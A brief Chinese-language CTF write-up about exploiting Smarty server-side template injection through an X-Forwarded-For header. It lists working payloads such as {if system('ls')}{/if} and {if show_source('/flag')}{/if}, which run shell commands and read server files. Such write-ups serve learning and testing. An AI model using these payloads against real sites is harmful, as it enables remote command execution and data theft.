题目打开有xff头(但nss我试了没有),试着改一改,发现可能是注入点,然后进行注入即可。

看到有操作是直接{{system('cat /flag')}}

不过考点应该是smarty的

{$smarty.version}
Smarty支持使用{php}{/php}标签来执行被包裹其中的php指令。 
如 {php}phpinfo();{/php}
但是3.1.30已废除{php}标签
Smarty的{if}条件判断和PHP的if 非常相似,只是增加了一些特性。全部的PHP条件表达式和函数都可以在if内使用,如*||*,or,&&,and,is_array(), 等等。
{if phpinfo()}{/if}
{if system('ls')}{/if}
{if show_source('/flag')}{/if}

https://www.freebuf.com/column/219913.html